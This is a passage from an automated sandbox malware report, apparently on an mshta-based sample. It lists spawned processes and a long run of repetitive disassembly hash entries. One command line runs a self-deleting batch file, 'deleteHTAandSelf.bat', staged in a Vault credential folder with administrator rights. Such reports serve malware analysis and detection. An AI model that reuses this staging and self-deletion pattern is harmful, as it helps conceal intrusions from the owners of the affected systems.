Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Vault\cred\deleteHTAandSelf.bat" "
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	07:56:24
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	07:56:24
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 5 /nobreak
Imagebase:	0x7e0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 07E33BF5 Relevance: 2.6, Strings: 1, Instructions: 1350COMMON

Download Yara Rule

Strings

A5, xrefs: 07E34354

Memory Dump Source

Source File: 00000000.00000003.2215862574.0000000007E30000.00000010.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7e30000_mshta.jbxd

Similarity

API ID:
String ID: A5
API String ID: 0-4261980312
Opcode ID: 025e880c11047059b3e23b28f9eae8c68b4de61c6f779ccd004a10e5033644c8
Instruction ID: 802e5f805c2ed78e378f810340f36d2d64ba88c903013debac04c997956d5912
Opcode Fuzzy Hash: 025e880c11047059b3e23b28f9eae8c68b4de61c6f779ccd004a10e5033644c8
Instruction Fuzzy Hash: F9F159F0E012598FEB20CF58C598BA9BBF1FF45318F209199D568AB391C3759982CF90

Function 07E33BF5 Relevance: 2.6, Strings: 1, Instructions: 1350COMMON

Download Yara Rule

Strings

A5, xrefs: 07E34354

Memory Dump Source

Source File: 00000000.00000003.2215862574.0000000007E30000.00000010.00000800.00020000.00000000.sdmp, Offset: 07E32000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7e30000_mshta.jbxd

Similarity

API ID:
String ID: A5
API String ID: 0-4261980312
Opcode ID: 025e880c11047059b3e23b28f9eae8c68b4de61c6f779ccd004a10e5033644c8
Instruction ID: 802e5f805c2ed78e378f810340f36d2d64ba88c903013debac04c997956d5912
Opcode Fuzzy Hash: 025e880c11047059b3e23b28f9eae8c68b4de61c6f779ccd004a10e5033644c8
Instruction Fuzzy Hash: F9F159F0E012598FEB20CF58C598BA9BBF1FF45318F209199D568AB391C3759982CF90

Function 07E33BF5 Relevance: 2.6, Strings: 1, Instructions: 1350COMMON

Download Yara Rule

Strings

A5, xrefs: 07E34354

Memory Dump Source

Source File: 00000000.00000003.2215862574.0000000007E30000.00000010.00000800.00020000.00000000.sdmp, Offset: 07E33000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7e30000_mshta.jbxd

Similarity

API ID:
String ID: A5
API String ID: 0-4261980312
Opcode ID: 025e880c11047059b3e23b28f9eae8c68b4de61c6f779ccd004a10e5033644c8
Instruction ID: 802e5f805c2ed78e378f810340f36d2d64ba88c903013debac04c997956d5912
Opcode Fuzzy Hash: 025e880c11047059b3e23b28f9eae8c68b4de61c6f779ccd004a10e5033644c8
Instruction Fuzzy Hash: F9F159F0E012598FEB20CF58C598BA9BBF1FF45318F209199D568AB391C3759982CF90

Function 07E34000 Relevance: 1.8, Strings: 1, Instructions: 552COMMON

Download Yara Rule

Strings

A5, xrefs: 07E34354

Memory Dump Source

Source File: 00000000.00000003.2215862574.0000000007E30000.00000010.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7e30000_mshta.jbxd

Similarity

API ID:
String ID: A5
API String ID: 0-4261980312
Opcode ID: ac188edcc8802bb4dc9b4cb52478249b788438970e4c344ee08bcb1150f49384
Instruction ID: 35b14ff1d1f4e9db4d870401a7f31748ad76689e5ce1c7cb1b88efef499d0514
Opcode Fuzzy Hash: ac188edcc8802bb4dc9b4cb52478249b788438970e4c344ee08bcb1150f49384
Instruction Fuzzy Hash: 3A42ACF0915396CFDB20CF64D449BA9BBB0FB46328F105289D1696B3D1C779A982CF90

Function 07E34000 Relevance: 1.8, Strings: 1, Instructions: 552COMMON

Download Yara Rule

Strings

A5, xrefs: 07E34354

Memory Dump Source

Source File: 00000000.00000003.2215862574.0000000007E30000.00000010.00000800.00020000.00000000.sdmp, Offset: 07E32000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7e30000_mshta.jbxd

Similarity

API ID:
String ID: A5
API String ID: 0-4261980312
Opcode ID: ac188edcc8802bb4dc9b4cb52478249b788438970e4c344ee08bcb1150f49384
Instruction ID: 35b14ff1d1f4e9db4d870401a7f31748ad76689e5ce1c7cb1b88efef499d0514
Opcode Fuzzy Hash: ac188edcc8802bb4dc9b4cb52478249b788438970e4c344ee08bcb1150f49384
Instruction Fuzzy Hash: 3A42ACF0915396CFDB20CF64D449BA9BBB0FB46328F105289D1696B3D1C779A982CF90

Function 07E34000 Relevance: 1.8, Strings: 1, Instructions: 552COMMON

Download Yara Rule

Strings

A5, xrefs: 07E34354

Memory Dump Source

Source File: 00000000.00000003.2215862574.0000000007E30000.00000010.00000800.00020000.00000000.sdmp, Offset: 07E34000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7e30000_mshta.jbxd

Similarity

API ID:
String ID: A5
API String ID: 0-4261980312
Opcode ID: ac188edcc8802bb4dc9b4cb52478249b788438970e4c344ee08bcb1150f49384
Instruction ID: 35b14ff1d1f4e9db4d870401a7f31748ad76689e5ce1c7cb1b88efef499d0514
Opcode Fuzzy Hash: ac188edcc8802bb4dc9b4cb52478249b788438970e4c344ee08bcb1150f49384
Instruction Fuzzy Hash: 3A42ACF0915396CFDB20CF64D449BA9BBB0FB46328F105289D1696B3D1C779A982CF90

Function 07E32C00 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2215862574.0000000007E30000.00000010.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7e30000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccaace9022bfac01b7076478dd26f13625e3eb943ecdbadc87f233eb00f842f3
Instruction ID: 21b4b83133d47df2d85430f6ad1a18b61869c78c1e2932f1a19acfee25aefc29
Opcode Fuzzy Hash: ccaace9022bfac01b7076478dd26f13625e3eb943ecdbadc87f233eb00f842f3
Instruction Fuzzy Hash: 6F3127B0A11A1ACECF15CE74C8876AEB3ADFF0A754F005614E79ABF191D7708442C7A1

Function 07E32C00 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2215862574.0000000007E30000.00000010.00000800.00020000.00000000.sdmp, Offset: 07E32000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7e30000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccaace9022bfac01b7076478dd26f13625e3eb943ecdbadc87f233eb00f842f3
Instruction ID: 21b4b83133d47df2d85430f6ad1a18b61869c78c1e2932f1a19acfee25aefc29
Opcode Fuzzy Hash: ccaace9022bfac01b7076478dd26f13625e3eb943ecdbadc87f233eb00f842f3
Instruction Fuzzy Hash: 6F3127B0A11A1ACECF15CE74C8876AEB3ADFF0A754F005614E79ABF191D7708442C7A1

Function 07E328D1 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2215862574.0000000007E30000.00000010.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7e30000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6c8fccf4d834465cacf4a7a8e07f1a555d49fe897c9c0e1326d496ddac3dce6
Instruction ID: 142ccf30be4b227aea7faa808f9039290a490f638fb8d5c37b197abc6f7fe961
Opcode Fuzzy Hash: e6c8fccf4d834465cacf4a7a8e07f1a555d49fe897c9c0e1326d496ddac3dce6
Instruction Fuzzy Hash: 0631E5F1A06343CFDB388E68C498774F7A8FB51269F15A36DC7A50A291D3758891CB44

Function 07E328D1 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2215862574.0000000007E30000.00000010.00000800.00020000.00000000.sdmp, Offset: 07E32000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7e30000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6c8fccf4d834465cacf4a7a8e07f1a555d49fe897c9c0e1326d496ddac3dce6
Instruction ID: 142ccf30be4b227aea7faa808f9039290a490f638fb8d5c37b197abc6f7fe961
Opcode Fuzzy Hash: e6c8fccf4d834465cacf4a7a8e07f1a555d49fe897c9c0e1326d496ddac3dce6
Instruction Fuzzy Hash: 0631E5F1A06343CFDB388E68C498774F7A8FB51269F15A36DC7A50A291D3758891CB44

Function 07E33750 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2215862574.0000000007E30000.00000010.00000800.00020000.00000000.sdmp, Offset: 07E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7e30000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1913560e3f36c5b845dd4655ee8cbef8c9994e2b86d73d0b64cda68f92ac0277
Instruction ID: c872c8cf955369dce9d1c377b143b2035dd51e17ae32baf973e40a85f7027478
Opcode Fuzzy Hash: 1913560e3f36c5b845dd4655ee8cbef8c9994e2b86d73d0b64cda68f92ac0277
Instruction Fuzzy Hash: 401188B1A01201AFDB14CF84DC85FAEF7E5BF94310F14891EFA69AB260DB74A901CB50

Function 07E33750 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2215862574.0000000007E30000.00000010.00000800.00020000.00000000.sdmp, Offset: 07E32000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7e30000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1913560e3f36c5b845dd4655ee8cbef8c9994e2b86d73d0b64cda68f92ac0277
Instruction ID: c872c8cf955369dce9d1c377b143b2035dd51e17ae32baf973e40a85f7027478
Opcode Fuzzy Hash: 1913560e3f36c5b845dd4655ee8cbef8c9994e2b86d73d0b64cda68f92ac0277
Instruction Fuzzy Hash: 401188B1A01201AFDB14CF84DC85FAEF7E5BF94310F14891EFA69AB260DB74A901CB50

Function 07E33750 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2215862574.0000000007E30000.00000010.00000800.00020000.00000000.sdmp, Offset: 07E33000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7e30000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1913560e3f36c5b845dd4655ee8cbef8c9994e2b86d73d0b64cda68f92ac0277
Instruction ID: c872c8cf955369dce9d1c377b143b2035dd51e17ae32baf973e40a85f7027478
Opcode Fuzzy Hash: 1913560e3f36c5b845dd4655ee8cbef8c9994e2b86d73d0b64cda68f92ac0277
Instruction Fuzzy Hash: 401188B1A01201AFDB14CF84DC85FAEF7E5BF94310F14891EFA69AB260DB74A901CB50

Function 07DD0FDF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0FD7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0F97 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0FBF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0FB7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0BAF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0BA7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0F07 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0ECF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0EC7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0EEF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0EE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0E97 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0E8F Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0EAF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0EA7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0E77 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0E6F Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0E67 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0E0F Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0E07 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0E3F Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0E37 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0E2F Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_7dd0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction ID: a019fa9a02094c946e546464e3fb19e07d8ac3d9755c80387e155dd40d0bf068
Opcode Fuzzy Hash: c3a15be25e73e0af5cd098aeb9f1030a3306e00c055dd63b442d0747fe722849
Instruction Fuzzy Hash:

Function 07DD0E27 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2216121865.0000000007DD0000.00000010.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

